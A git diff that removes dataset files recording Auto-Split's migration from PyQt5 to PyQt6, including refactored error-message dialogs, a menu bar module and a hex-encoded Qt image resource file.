def multipleResetImagesError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Only one image with the keyword \"reset\" is allowed.") -- msgBox.exec_() -+ setTextMessage("Only one image with the keyword \"reset\" is allowed.") - - - def noResetImageThresholdError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Reset Image must have a custom threshold. Please set one and check that it is valid") -- msgBox.exec_() -+ setTextMessage("Reset Image must have a custom threshold. Please set one and check that it is valid") - - - def resetHotkeyError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Your split image folder contains a reset image, but no reset hotkey is set.") -- msgBox.exec_() -+ setTextMessage("Your split image folder contains a reset image, but no reset hotkey is set.") - - - def dummySplitsError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText( -- "Group dummy splits when undoing/skipping cannot be checked if any split image has a loop parameter greater than 1") -- msgBox.exec_() -+ setTextMessage("Group dummy splits when undoing/skipping cannot be checked if any split image has a loop parameter greater than 1") -+ - - def settingsNotFoundError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No settings file found. 
The settings file is saved when the program is closed.") -- msgBox.exec_() -+ setTextMessage("No settings file found. The settings file is saved when the program is closed.") -+ - - def oldVersionSettingsFileError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Old version settings file detected. This version allows settings files from v1.3 and above.") -- msgBox.exec_() -+ setTextMessage("Old version settings file detected. This version allows settings files from v1.3 and above.") -+ - - def invalidSettingsError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Invalid settings file.") -- msgBox.exec_() -+ setTextMessage("Invalid settings file.") -+ - - def noSettingsFileOnOpenError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No settings file found. One can be loaded on open if placed in the same folder as AutoSplit.exe") -- msgBox.exec_() -+ setTextMessage("No settings file found. One can be loaded on open if placed in the same folder as AutoSplit.exe") -+ - - def tooManySettingsFilesOnOpenError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Too many settings files found. Only one can be loaded on open if placed in the same folder as AutoSplit.exe") -- msgBox.exec_() -+ setTextMessage("Too many settings files found. Only one can be loaded on open if placed in the same folder as AutoSplit.exe") diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.source.py deleted file mode 100644 index f6cb1ed..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.source.py +++ /dev/null @@ -1,142 +0,0 @@ -# Error messages -from PyQt5 import QtWidgets - -def splitImageDirectoryError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No split image folder is selected.") - msgBox.exec_() - -def splitImageDirectoryNotFoundError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("The Split Image Folder does not exist.") - msgBox.exec_() - - -def imageTypeError(self, image): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText( - '"' + image + '" is not a valid image file or the full image file path contains a special character.') - msgBox.exec_() - - -def regionError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No region is selected or the Capture Region window is not open. Select a region or load settings while the Capture Region window is open.") - msgBox.exec_() - - -def regionSizeError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Width and height cannot be 0. 
Please select a larger region.") - msgBox.exec_() - - -def splitHotkeyError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No split hotkey has been set.") - msgBox.exec_() - -def pauseHotkeyError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Your split image folder contains an image filename with a pause flag {p}, but no pause hotkey is set.") - msgBox.exec_() - -def customThresholdError(self, image): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("\"" + image + "\" doesn't have a valid custom threshold.") - msgBox.exec_() - - -def customPauseError(self, image): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("\"" + image + "\" doesn't have a valid custom pause time.") - msgBox.exec_() - - -def alphaChannelError(self, image): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("\"" + image + "\" is marked with mask flag but it doesn't have transparency.") - msgBox.exec_() - - -def alignRegionImageTypeError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("File not a valid image file") - msgBox.exec_() - - -def alignmentNotMatchedError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No area in capture region matched reference image. Alignment failed.") - msgBox.exec_() - - -def multipleResetImagesError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Only one image with the keyword \"reset\" is allowed.") - msgBox.exec_() - - -def noResetImageThresholdError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Reset Image must have a custom threshold. Please set one and check that it is valid") - msgBox.exec_() - - -def resetHotkeyError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Your split image folder contains a reset image, but no reset hotkey is set.") - msgBox.exec_() - - -def dummySplitsError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText( - "Group dummy splits when undoing/skipping cannot be checked if any split image has a loop parameter greater than 1") - msgBox.exec_() - -def settingsNotFoundError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No settings file found. The settings file is saved when the program is closed.") - msgBox.exec_() - -def oldVersionSettingsFileError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Old version settings file detected. This version allows settings files from v1.3 and above.") - msgBox.exec_() - -def invalidSettingsError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Invalid settings file.") - msgBox.exec_() - -def noSettingsFileOnOpenError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No settings file found. One can be loaded on open if placed in the same folder as AutoSplit.exe") - msgBox.exec_() - -def tooManySettingsFilesOnOpenError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Too many settings files found. 
Only one can be loaded on open if placed in the same folder as AutoSplit.exe") - msgBox.exec_() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.target.py deleted file mode 100644 index 8a325bb..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.target.py +++ /dev/null @@ -1,93 +0,0 @@ -# Error messages -from PyQt6 import QtWidgets - - -def setTextMessage(message: str): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText(message) - msgBox.exec() - - -def splitImageDirectoryError(self): - setTextMessage("No split image folder is selected.") - - -def splitImageDirectoryNotFoundError(self): - setTextMessage("The Split Image Folder does not exist.") - - -def imageTypeError(self, image): - setTextMessage('"' + image + '" is not a valid image file or the full image file path contains a special character.') - - -def regionError(self): - setTextMessage("No region is selected or the Capture Region window is not open. Select a region or load settings while the Capture Region window is open.") - - -def regionSizeError(self): - setTextMessage("Width and height cannot be 0. Please select a larger region.") - - -def splitHotkeyError(self): - setTextMessage("No split hotkey has been set.") - - -def pauseHotkeyError(self): - setTextMessage("Your split image folder contains an image filename with a pause flag {p}, but no pause hotkey is set.") - - -def customThresholdError(self, image): - setTextMessage("\"" + image + "\" doesn't have a valid custom threshold.") - - -def customPauseError(self, image): - setTextMessage("\"" + image + "\" doesn't have a valid custom pause time.") - - -def alphaChannelError(self, image): - setTextMessage("\"" + image + "\" is marked with mask flag but it doesn't have transparency.") - - -def alignRegionImageTypeError(self): - setTextMessage("File not a valid image file") - - -def alignmentNotMatchedError(self): - setTextMessage("No area in capture region matched reference image. Alignment failed.") - - -def multipleResetImagesError(self): - setTextMessage("Only one image with the keyword \"reset\" is allowed.") - - -def noResetImageThresholdError(self): - setTextMessage("Reset Image must have a custom threshold. Please set one and check that it is valid") - - -def resetHotkeyError(self): - setTextMessage("Your split image folder contains a reset image, but no reset hotkey is set.") - - -def dummySplitsError(self): - setTextMessage("Group dummy splits when undoing/skipping cannot be checked if any split image has a loop parameter greater than 1") - - -def settingsNotFoundError(self): - setTextMessage("No settings file found. The settings file is saved when the program is closed.") - - -def oldVersionSettingsFileError(self): - setTextMessage("Old version settings file detected. This version allows settings files from v1.3 and above.") - - -def invalidSettingsError(self): - setTextMessage("Invalid settings file.") - - -def noSettingsFileOnOpenError(self): - setTextMessage("No settings file found. One can be loaded on open if placed in the same folder as AutoSplit.exe") - - -def tooManySettingsFilesOnOpenError(self): - setTextMessage("Too many settings files found. 
Only one can be loaded on open if placed in the same folder as AutoSplit.exe") diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.diff deleted file mode 100644 index aae96b2..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.diff +++ /dev/null @@ -1,11 +0,0 @@ -diff --git a/src/menu_bar.py b/src/menu_bar.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/menu_bar.py - +++ b/src/menu_bar.py -@@ -1,5 +1,5 @@ - import os --from PyQt5 import QtWidgets -+from PyQt6 import QtWidgets - import about - - # About Window diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.source.py deleted file mode 100644 index c65e7d5..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.source.py +++ /dev/null @@ -1,20 +0,0 @@ -import os -from PyQt5 import QtWidgets -import about - -# About Window -class AboutWidget(QtWidgets.QWidget, about.Ui_aboutAutoSplitWidget): - def __init__(self): - super(AboutWidget, self).__init__() - self.setupUi(self) - self.createdbyLabel.setOpenExternalLinks(True) - self.donatebuttonLabel.setOpenExternalLinks(True) - self.show() - -def viewHelp(self): - os.system("start \"\" https://github.com/Toufool/Auto-Split#tutorial") - return - - -def about(self): - self.AboutWidget = AboutWidget() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.target.py deleted file mode 100644 index 3c2b30a..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.target.py +++ /dev/null @@ -1,20 +0,0 @@ -import os -from PyQt6 import QtWidgets -import about - -# About Window -class AboutWidget(QtWidgets.QWidget, about.Ui_aboutAutoSplitWidget): - def __init__(self): - super(AboutWidget, self).__init__() - self.setupUi(self) - self.createdbyLabel.setOpenExternalLinks(True) - self.donatebuttonLabel.setOpenExternalLinks(True) - self.show() - -def viewHelp(self): - os.system("start \"\" https://github.com/Toufool/Auto-Split#tutorial") - return - - -def about(self): - self.AboutWidget = AboutWidget() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.diff deleted file mode 100644 index 72c3600..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/src/resources_rc.py b/src/resources_rc.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/resources_rc.py - +++ b/src/resources_rc.py -@@ -1,12 +1,9 @@ --# -*- coding: utf-8 -*- -- --# Resource object code --# --# Created by: The Resource Compiler for PyQt5 (Qt v4.8.7) --# -+# Resource object code (Python 3) -+# Created by: object code -+# Created by: The Resource Compiler for Qt version 6.1.2 - # WARNING! All changes made in this file will be lost! 
- --from PyQt5 import QtCore -+from PySide6 import QtCore - - qt_resource_data = b"\ - \x00\x00\x3b\x7f\ diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.source.py deleted file mode 100644 index 2abb2a5..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.source.py +++ /dev/null @@ -1,3092 +0,0 @@ -# -*- coding: utf-8 -*- - -# Resource object code -# -# Created by: The Resource Compiler for PyQt5 (Qt v4.8.7) -# -# WARNING! All changes made in this file will be lost! - -from PyQt5 import QtCore - -qt_resource_data = b"\ -\x00\x00\x3b\x7f\ -\x89\ -\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\ -\x00\x00\xaa\x00\x00\x00\x51\x08\x06\x00\x00\x00\x42\x23\x3d\x58\ -\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\ -\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\ -\x09\x70\x48\x59\x73\x00\x00\x0e\xc3\x00\x00\x0e\xc3\x01\xc7\x6f\ -\xa8\x64\x00\x00\x00\x1a\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\ -\x72\x65\x00\x50\x61\x69\x6e\x74\x2e\x4e\x45\x54\x20\x76\x33\x2e\ -\x35\x2e\x31\x31\x47\xf3\x42\x37\x00\x00\x3a\xee\x49\x44\x41\x54\ -\x78\x5e\xed\x9d\x07\x58\x54\xc7\xfa\xc6\xaf\x08\x48\xb7\xd7\x98\ -\xd8\x3b\x8a\xbd\x25\x31\xd1\x68\x62\xef\xe9\x76\xa5\x28\x2a\x8a\ -\x25\xb1\xc4\x24\xc6\xc4\x2e\x02\x8a\xd8\x7b\x62\x49\xec\x5d\xec\ -\xdd\xd8\xa5\x48\x11\xc5\x4e\xef\xb0\xc0\xee\x79\xff\xef\xcc\xee\ -\x52\x96\x45\x89\xc9\xbd\xe6\xff\x3c\x4c\x9e\xdf\x9d\x39\x33\xdf\ -\xcc\x99\x73\xe6\x9d\x6f\x66\x76\x57\xee\x7f\x8a\x42\x51\x28\x0a\ -\x45\xa1\x28\x14\x85\xa2\x50\x14\x8a\x42\x51\x28\x0a\x45\xa1\x28\ -\xbc\x81\x90\xb5\xae\xa3\xa5\xb2\xe1\xa3\x32\xca\x7e\x97\xcd\x59\ -\x1b\xbb\x6d\x56\x96\x54\xdf\xac\x78\xd6\xd9\x0c\x8f\xda\x9b\xe1\ -\x49\x96\xbe\x26\x9e\xb5\x48\xcd\xbc\x18\xb3\xcb\x07\xeb\x2d\x15\ -\xb6\xb9\x11\x79\x85\xb1\x33\xb4\x31\x86\x91\x7a\x86\xfd\x2c\x74\ -\x5f\x49\xbe\xba\xc6\xfa\xfa\xba\xb0\x2d\xc3\xf6\x8d\xbe\x8b\x7f\ -\x0e\x45\xf7\x7e\x94\xa5\x75\x36\x2b\xab\xda\x6e\xd6\xec\x1d\xb5\ -\x19\xfb\x5d\x9a\x2a\xab\xdb\x5b\x2b\x9b\xbb\xeb\x54\xf3\x3f\x0c\ -\x58\xf3\x6e\x57\x76\xcc\x5d\xb3\xa2\xf9\x0b\x65\x69\x4d\xb0\x83\ -\xc0\xd2\x1a\x50\xbc\xea\x40\x23\xae\x3d\xc5\x75\x6d\xc6\xc6\x10\ -\xe5\xb9\xa9\x45\x0c\x6d\x44\x9e\x21\x06\x36\x6c\x5f\xdc\x23\x3f\ -\xe2\xde\xb9\x29\x8c\x4d\x41\xd4\x34\x40\xe4\x19\x6b\xef\xff\x0b\ -\xf9\x9f\xa9\x50\xef\xba\x90\x70\xa2\xc9\x71\xd1\xea\x81\x6d\x33\ -\x56\xa8\x0b\xac\x68\x06\x78\xd5\xff\x46\xe3\xdb\x6e\xa8\x4e\x42\ -\xff\xbd\x80\xcd\x9d\x4d\xb0\xaa\x6d\x27\x2c\x6b\x74\x5a\xf1\xac\ -\x9f\x08\x9f\xc6\x50\x36\x76\x04\xf6\x0f\x87\x72\x79\x0e\x94\x9b\ -\x5e\x50\x07\xac\x07\x02\xd6\x92\xf5\x50\x02\xd6\x00\xfe\x1b\xf2\ -\x12\x20\x10\x36\xb9\x59\xf7\x2f\x46\x3c\x8b\x21\xc6\xec\x0c\x31\ -\x56\xcf\x18\xaf\x5b\xaf\x10\xf8\x17\x16\x31\x4e\xc6\x58\xfd\x0a\ -\x8c\xd4\xb9\xcb\x7c\xa2\xdc\x5d\x05\xcd\x2d\x6f\xea\xe2\x27\x28\ -\x47\x5c\xa0\x6c\xee\x02\x8d\x2f\xf5\xe2\x55\x2f\x43\xf1\xae\x17\ -\x02\x9f\xa6\x1f\x63\x43\xc7\x92\x3a\x69\xfd\x73\x41\xd9\xd4\xd1\ -\x8e\x9e\xd3\x5d\x59\xd6\x08\x8a\x8f\x3d\x94\xbd\x5f\x41\xb9\xee\ -\x09\x84\x6c\x87\x3a\x62\x3f\x10\xb1\x0f\x8a\x0e\x0d\xaf\x95\x47\ -\x44\x97\x9f\x1f\x91\xff\x1a\x3c\x64\xdd\x87\x7b\xf3\x62\xac\x7d\ -\x69\xf7\x4f\x61\x70\xbf\xc2\xf2\x60\x8f\x11\x44\x7e\x6e\x8c\xd9\ -\x08\x72\x97\xed\xce\x95\xfe\xab\x88\xba\x86\xec\x82\x12\x6e\xc8\ -\xee\x7c\x20\xfc\x8f\x42\xb2\x2b\x0f\xb2\x3d\x79\x0f\xd1\x8e\x48\ 
-[... qt_resource_data continues for roughly 3,000 further lines of hex-escaped binary image data (the embedded PNG icon resources, per the @@ -1,3092 +0,0 @@ hunk header); elided ...]
-\x16\x1f\x9f\x80\xa8\xc8\x18\x0a\xf1\x21\xee\x05\x87\x21\xf2\x45\ -\x14\xcb\x23\x11\x1a\x1a\x8e\xd8\x98\x78\xa4\xb2\x6e\x2a\xef\xf1\ -\x46\xf7\xa8\xa3\x28\xd4\x16\x13\x62\xd1\x84\x7b\x49\x7b\xd2\xc4\ -\x95\xcb\xbe\x48\x8f\x89\x47\xd3\xb1\x14\xe3\xb8\x04\x34\xe5\x16\ -\xc0\x61\x6c\xa2\x4c\xb7\x64\x59\x33\xda\x34\x67\x5e\x8b\xf1\x71\ -\x4c\x33\x66\x7e\x8b\x71\x71\x2c\xd3\xd2\x8a\xd7\xad\xc7\x27\xa0\ -\x13\xdb\xfd\x60\x62\x1c\x1c\x3d\x0a\xf6\xa8\xe5\xcb\x7f\x75\xd0\ -\x8a\x4b\x7f\x23\x9b\xb6\x38\x68\x56\x1a\x77\x4d\xad\xa5\x50\xfd\ -\x4d\x2c\x29\xd6\x12\xbc\x2e\x41\x4f\x4a\xc1\xd2\x9b\x06\x0a\x6f\ -\x4a\xa1\x86\x08\x4f\xca\xf4\xfd\x9a\x25\xf0\xfc\x43\x53\x3c\xef\ -\x68\x86\xc8\x6e\xe6\x48\x1a\x4d\x31\x8e\xa3\x48\x47\xd3\x93\xba\ -\x70\xa9\x77\xa5\x77\x75\x64\x9a\x62\x8d\x77\xa5\x48\xe9\x69\xe3\ -\xb9\x1d\x48\x72\x2f\x8e\x94\xef\x8b\x63\xcb\x88\x52\xb0\xb2\xfd\ -\x0c\x25\x4b\x0f\xc1\xdb\xd5\xf3\x7a\xd4\xb4\xcd\xc3\xcf\xa4\xfa\ -\x38\x22\x6d\xd9\x48\x24\xad\x74\x82\x3a\xea\x81\x4e\x3f\xe0\xc0\ -\x66\xc1\xd1\x39\x00\xcd\xda\xfc\x09\x27\x97\x60\x0a\x48\x41\xa7\ -\x2e\x37\xe0\xd0\xe2\x32\x4f\xe2\x11\xd2\x26\x26\x2e\x0b\x4b\x96\ -\x45\xa0\x6b\xcf\xab\xa8\x5a\xdd\x0f\x95\xaa\x9e\x80\x7d\xe3\xcb\ -\x38\x78\x28\x56\x96\x8b\xf0\xf4\x99\x0a\x5f\x0d\xf1\x47\xb3\x96\ -\x97\xd0\xba\xfd\x55\x5c\xbc\x94\xa8\x2b\x91\x21\x5b\xa8\x87\x8f\ -\x9c\xd8\x75\xee\xc2\x15\x3c\x78\x18\x81\x1e\xbd\x06\x90\x5e\xf8\ -\x7a\xd0\x48\x5c\xbb\x76\x1b\x33\x67\xfd\x80\xdf\x7f\xdf\x8b\x51\ -\x8e\x63\xd0\xbf\x6f\x1f\x6c\xde\xb8\x15\x21\x14\xd8\xa7\x9f\x0e\ -\x42\xdf\x3e\x7d\xe1\x3e\x61\x32\x54\xcf\x9f\x22\x66\xc9\x54\x6e\ -\x8d\x06\x22\xf2\x47\x17\x24\xdd\xb9\x89\x89\x13\xa7\xe2\xf0\x11\ -\x3f\x4e\x1c\x35\x7e\xfc\x61\x1e\x56\xaf\x5a\x8b\xf7\xde\xef\x84\ -\x4f\x07\xf4\xc5\x9a\x55\xbe\x18\x3a\xd4\x19\xbd\x7b\xf5\xc3\xa7\ -\x9f\x0d\xc1\x91\xc3\xc7\xf0\xec\xe9\xd3\x37\x2b\xd4\xb1\xde\xf7\ -\xdc\xd6\x1e\x49\xc3\xc6\x33\x19\x38\x7d\x5b\x85\x5f\xcf\xab\xb0\ -\xed\x74\x3a\x16\xef\x4a\x65\x9e\x0a\x87\x6e\x64\x60\xa5\x5f\x3a\ -\x56\x9f\x48\xc3\x91\x9b\x2a\xac\x3c\xa6\xc2\x9a\x93\x69\xf0\x63\ -\xfa\xc8\xf5\x4c\x1c\xfa\x33\x1d\x6b\x58\x76\xf8\x46\x26\x36\xb2\ -\xde\xe5\x20\x15\x36\xb3\xde\xf9\x80\x0c\x69\xbf\xed\x64\x2a\x5c\ -\x96\x25\xe3\x46\x78\x96\xf1\xa5\x9f\x42\xb5\xb4\x1d\x80\x29\x25\ -\xde\x42\x90\x99\x15\x42\xcd\xac\xb9\xa4\x0b\xef\x69\xc1\x7d\x68\ -\x09\xc2\x65\xde\xd4\x12\xa1\x62\x2b\xc0\xf2\x70\x96\x87\x98\x5b\ -\xe1\x3e\xc5\x1a\x51\xc6\x16\x0f\x2a\xd9\xe1\x41\x05\x6b\x44\x54\ -\xb4\xc6\xf3\xc6\xe6\x48\xa1\x57\x4d\x19\x57\x1c\x89\xa3\x8b\x73\ -\xc9\xd7\x0a\x36\x96\x62\x8d\xe7\x16\x20\x76\x84\x48\xff\x87\x7b\ -\x56\x53\x24\x4d\xe0\x56\x61\x96\x09\x5a\xd4\x68\x01\x9b\x32\x43\ -\x50\xbd\xc6\xe8\x7c\x1e\x35\xea\xdc\x36\x1c\xee\x53\x0d\x91\xbd\ -\xc5\x9f\xb8\xfc\x54\x2b\x1f\x86\x5b\xb7\x53\x50\xa9\xc2\x09\xd8\ -\x58\x1d\xc6\xfa\x35\x4f\x78\x22\xd6\xc0\xd6\xda\x0f\x36\x36\x47\ -\xb0\x6d\xdb\x73\x69\xe3\xe8\x12\x80\xe2\xa6\xfb\x61\x61\xbe\x1b\ -\x6f\x57\x3e\x88\x1a\x6f\x1f\xe3\xd6\xe6\x24\x42\x43\xd2\x64\xb9\ -\x08\xab\x56\x3d\x86\x8d\xf5\x71\xd8\xda\x1c\x85\x9d\xf5\x61\xec\ -\xd9\x13\xa9\x2b\x91\x21\x5b\xa8\x27\x4f\x9c\xde\x75\xf1\xe2\x25\ -\xd6\x0d\xc3\x7b\xef\x75\xa4\xc0\x9f\x62\xc3\xba\x95\xe8\xf2\x71\ -\x6f\x0a\x6a\x14\x16\x2c\xf0\xc0\xbb\xcc\x3f\xee\x77\x16\x09\xf4\ -\x8e\xc3\x86\x39\x62\xe1\xfc\x9f\x29\xc2\x2c\x24\xc7\x3c\x43\xe4\ -\xcf\x4e\x88\x99\xd3\x0f\xf1\x9b\x26\x22\x7a\xf1\x20\x44\xce\xf8\ -\x02\xfb\xb7\x6c\xc0\xe7\x9f\x0f\xc6\xed\xdb\xfe\xf8\xe4\x93\x6e\ -\x08\x08\x08\x40\x9b\x76\xef\xe1\x8f\xdd\x07\x71\x3f\xfc\x11\x7a\ 
-\xf7\x1b\x80\x43\x14\x68\xaf\x5e\xbd\x71\xea\xd4\x49\x79\x98\x7a\ -\xa3\x42\xbd\x72\xf7\x91\xdb\x7a\x0a\x6f\xb8\x77\x12\x0e\x52\x6c\ -\x23\x19\xcf\xfc\x35\x15\x47\x6f\x65\x60\xe0\x82\x24\x78\x1d\x4c\ -\xc3\x08\xef\x64\x0a\x34\x1d\xdb\xcf\x67\x61\xca\x86\x64\x7c\xbb\ -\x29\x05\x0b\xf7\xa4\xe3\x87\x9d\x69\x98\xb6\x35\x0d\xbb\x2f\xaa\ -\x30\xe7\xf7\x14\x4c\x58\x9b\x8a\xd3\x81\x2a\xd6\x4b\x84\xc7\x81\ -\x34\xfc\xb4\x3d\x05\x3b\x29\xda\xd1\xcb\x92\x70\x35\x3c\xd3\xb8\ -\x50\x2b\x0e\x3e\x58\xc6\xe6\x23\xec\xe6\x49\x3e\xb8\x5a\x0d\x84\ -\x37\x68\x88\xd0\x52\xe5\xf0\xa0\x51\x53\x84\x57\x78\x0b\x11\xf4\ -\xa6\x0f\x4c\xcd\x29\x50\x4b\x84\x51\xa4\xe1\xf4\xb8\x21\xd6\x76\ -\x88\xa8\x66\x85\xe8\x4e\xf4\xa4\x24\xea\xe3\x12\x88\xfe\xa8\x04\ -\x5e\x7c\x62\x86\xa4\xb1\xa6\x48\xfd\xae\x0a\x92\xe7\x39\x50\x8c\ -\x65\x90\x38\x86\xde\x93\x07\x2a\x11\xc7\x3b\x73\xbf\x4a\xcf\x2a\ -\x3c\x6a\xe2\x54\x0b\xa4\x2f\xaa\x86\xd9\xbd\xaa\xd2\xa3\x7e\x86\ -\x2a\xef\xb8\xe4\x13\x6a\x5c\x9c\x0a\x9f\xf6\xde\x84\x5f\xda\xd4\ -\x46\xec\xf4\x0e\x5a\xf9\x30\x4c\x9a\x1c\x00\x4b\x8b\xfd\xa8\x57\ -\xd3\x0f\x0f\x1f\xa4\xe2\xf8\xf1\x38\x0a\xf2\x10\xca\x94\x3d\x81\ -\x83\x07\xa3\x71\xf3\x7a\x12\xde\xae\x7a\x1c\x16\x16\x7b\x31\x69\ -\xa2\x3f\x1e\x3e\x4c\xc5\xa3\x88\x34\x84\x85\xa6\x72\xc0\xb5\x5b\ -\x83\x24\x6e\x09\xda\xb6\xbb\x4c\x81\x1f\x43\xb9\x52\x47\x60\x6d\ -\x7e\x00\xa3\xc7\x06\xc8\x32\x5d\xc8\x16\xea\xc5\x8b\x57\x77\x5d\ -\xbb\x7e\x93\x4b\x71\x08\x85\xda\x81\xcb\xf2\x13\xdc\xb8\x7e\x0b\ -\xad\x5b\xb5\xc5\x80\x01\x9f\x62\xc7\x8e\xed\xd8\xf3\xc7\x76\xf4\ -\xee\xdd\x03\xa3\xc7\x4c\x44\xe7\xce\x1f\xe3\xcc\x99\x73\x72\x3f\ -\xaa\x8e\x8f\xc6\x8b\x09\x5d\x11\xff\xeb\x2c\xa4\xdd\x3c\x88\xa4\ -\xbd\x8b\xf1\x62\x52\x67\x3c\xba\x74\x02\x1d\x3a\x7c\x80\x31\xa3\ -\xdd\x31\x75\xca\x24\x44\x46\xf1\x9c\xd1\xa0\x31\x46\x8c\x18\x8a\ -\x5d\x3b\x7f\x47\xb7\x1e\xbd\xd1\xb8\x71\x73\x7c\xfd\xc5\xd7\x48\ -\x4c\x8c\x7f\xf3\x42\x8d\x88\xc9\x70\x73\xf2\x4d\xc5\xd8\x35\xc9\ -\x70\x5a\x99\x2a\x3f\xd8\x9f\xb2\x21\x15\xe3\x18\x7f\xff\x6b\x0a\ -\xe6\xef\x56\xe1\xeb\x25\x29\x58\x79\x34\x0d\xdb\xcf\x66\x60\xcc\ -\x8a\x04\x8c\x5d\x95\x02\xdf\xa3\xe9\x98\xbc\x3e\x05\x93\x37\xa5\ -\xe3\xee\x63\x35\xbe\x5e\x9a\x0c\x97\xd5\x29\xf8\x96\xc2\xfd\x79\ -\x47\x1a\xbe\x5b\x9f\x8c\xcf\xe6\x27\x60\xc7\x99\x74\x38\x7b\x27\ -\xe2\xca\xfd\x02\x96\xfe\x0a\x83\x0e\x36\xb4\x6e\x85\xe3\x96\x65\ -\x70\x7b\xed\x56\xa4\x9c\x3a\x8d\xb3\x5f\x8e\x44\x0a\xbd\xc7\x73\ -\x27\x57\x3c\xfd\xf8\x13\x3c\x7e\xf7\x5d\x44\xd8\x56\xc4\xe3\x8e\ -\x1f\xe2\x7e\xc7\x8e\x08\x98\xfc\x0d\x9e\xb9\x0c\xc3\xc3\xa6\xef\ -\x20\x7a\x48\x0f\x84\x37\x7b\x07\xf7\x29\xa6\x88\x8f\x9a\x21\xf0\ -\xbb\x1e\x88\x0f\x3c\x8c\x80\x9b\xb7\x91\xfc\x87\x13\x52\x97\xb6\ -\x40\xf2\xfc\x86\x48\x9c\x66\x87\xc4\x5f\x6a\x21\x71\x46\x59\xa4\ -\x2e\xaa\x8d\x3b\x1e\x9d\x10\x77\xef\x18\x0e\xba\x96\x46\xc5\xf2\ -\xbd\x50\xb5\xda\x18\xa3\x7b\xd4\xf9\x3f\x86\xd1\x13\xfe\x84\x75\ 